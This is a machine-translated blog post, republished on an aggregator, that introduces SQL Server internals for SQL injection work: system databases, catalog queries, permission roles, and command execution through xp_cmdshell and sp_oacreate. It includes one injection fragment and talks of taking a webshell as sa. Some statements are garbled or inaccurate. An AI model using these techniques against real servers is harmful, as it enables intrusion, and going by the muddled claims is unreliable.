Understanding mssql database

Others 2020-04-15 07:52:39 views: null

0x00 Foreword

Since this time is relatively busy, the blog update is also relatively slow. I originally wanted to send this mssql database a few days ago, but because the structure of mssql is more complicated and there are more ways to use it, so I went into an in-depth study of the database structure of mssql and various types of utilization methods. Zuo did not delve into some manual injections.

0x01 understand mssql database

The mssql mentioned here is our sqlserver database

A relational database system launched by Microsoft in the United States. SQL Server is a scalable, high-performance, database management system designed for distributed client / server computing. It achieves an organic combination with Windows NT and provides an enterprise-level information management system solution based on transactions. 
( 1 ) High-performance design can make full use of the advantages of WindowsNT. 
( 2 ) Advanced system management, support Windows graphical management tools, support local and remote system management and configuration. 
( 3 ) Strong transaction processing function, using various methods to ensure data integrity. 
( 4 ) Support symmetric multiprocessor structure, stored procedure, ODBC, and have independent SQL language. SQLServer provides a superior database platform for users, developers and system integrators with its built-in data replication function, powerful management tools, tight integration with the Internet and open system structure.

The above is the information of Baidu Encyclopedia.

Mssql and sqlserver are very different, the structure of sqlserver is more complicated, and the injection statement is also more complicated. But if the database is run by the sa user during the injection, then we can easily take down the webshell. mssql can directly enable stored procedures to execute commands.

Let's take a look at the role of the mssql system's own database.

 

 

 

The master database stores the information of all objects, and the password of sa or other users is stored in ciphertext 
model: There is a template to create a user database 
msdb: user database, which stores all task schedules 
tmpdb: temporary database, if the display bit is restricted during injection , Exists in a table, and then burst the data. Restart will clear the tempdb data

The database comes with user introduction:

The # sign in front is the mssql internal user database 
, which is created only when the database is installed using nt at the beginning of the database installation.

 

 

 

If the msql execution command is to use the nt serivice \ mssqlserver service to execute the command.

 

Let's take a look below to see what is different from mysql.

select * from master.dbo.sysobjects where xtype = 'u';

matster is to specify the database name dot followed by his architecture plus the table name.

So what did we find out that there is no such table in this database?

In fact, this is just our view, not our real table.

sysobjects is a system view, used to store all objects created in the database, such as constraints, default values, logs, rules, stored procedures,

xtype is the representative object type: 
U: table (user-defined table) 
V: view 
P: stored procedure 
X: extended stored procedure

We can query all our database names

select * from master..sysdatabases;

 

 

 

This query is also our view information database in mssql also exists in the form of views

Check if the station library is separated

 and (select host_name()) = (select @@servername))

Query the name of the database, this function can traverse the number in the brackets to query the corresponding database name

SELECT DB_NAME();

 

 

 

 

Here comes the division of mssql permissions,

sa: sysadmin super administrator authority 
dbo: db_owner database administrator authority 
public : access user authority

 

 

0x02 stored procedure

Stored procedure (Stored Procedure) is 
a set of SQL statements in a large database system to complete a specific function, it is stored in the database, permanently effective after a compilation 
, the user specifies the name of the stored procedure and gives parameters (if the Stored procedure with parameters) to execute it. 
The stored procedure is an important object in the database. 
In the case of particularly large data volume, the use of stored procedures can achieve double-speed efficiency improvement

Then we can use stored procedures to directly execute cmd commands in actual combat

Commonly used stored procedures are xp_cmdshell, sp_oacreate sp_oacreate stored procedure execution command without echo, need to output to txt file and then view.

The 00 version is the default version 05 of xp_cmdshell, which needs to be manually started.

 

0x03 end

This article takes 3 hours, record the time. The next article writes various injection syntax and bypass techniques of mssql

 

Guess you like

Origin www.cnblogs.com/nice0e3/p/12702771.html
Recommended
Ranking
error: (-215:Assertion failed) !_img.empty() in function ‘cv::imwrite‘
Database migration between Navicat servers
Minimum number of rotation of the array: Array
balenaEtcher for mac (make a boot disk software) v1.5.67
Custom processing serialization and deserialization in jackson
Mu-en-mask system development software
Mastering Regular Expressions
Find mileage Java--
Web pages can not directly concern the public micro-channel number how to do? A key to arouse public concern number of micro-channel solutions
[CodeForces - 739B] Alyona and a tree Tree + [difference] + bipartite
Daily
More
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)

Code World

© 2018 codetd.com